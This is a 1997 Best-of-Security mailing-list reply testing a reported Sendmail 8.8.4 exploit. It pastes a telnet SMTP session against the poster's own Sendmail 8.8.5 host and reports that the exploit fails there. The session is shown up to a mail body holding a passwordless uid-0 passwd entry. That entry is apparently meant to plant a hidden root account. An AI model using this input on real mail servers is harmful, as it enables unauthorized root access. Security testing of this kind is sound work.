[93] in Best-of-Security
BoS: 8.8.4 exploit
daemon@ATHENA.MIT.EDU (Brian Tao)
Tue Mar 25 02:05:06 1997
Date: Mon, 24 Mar 1997 20:47:02 -0500 (EST)
From: Brian Tao <taob@risc.org>
In-Reply-To: <19970324120320.11012.qmail@suburbia.net>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
On Mon, 24 Mar 1997 proff@suburbia.net wrote:
>
> I haven't tested this one, and frankly I have my doubts. When I
> audited 8.6.12 the only *file access* problems related to group kmem
> - though it is possibly of course that bad code has creeped it's way
> in since then.
Doesn't seem to work with 8.8.5:
% telnet 0 25
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.8.5/8.8.5; Mon, 24 Mar 1997 20:39:07 -0500 (EST)
ehlo localhost
250-myhost Hello localhost [127.0.0.1], pleased to meet you
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
mail from: booga
250 booga... Sender ok
rcpt to: wooga@no-such-host.net
250 wooga@no-such-host.net... Recipient ok
data
354 Enter mail, end with "." on a line by itself
brian::0:0:Brian Tao:/:/bin/ksh
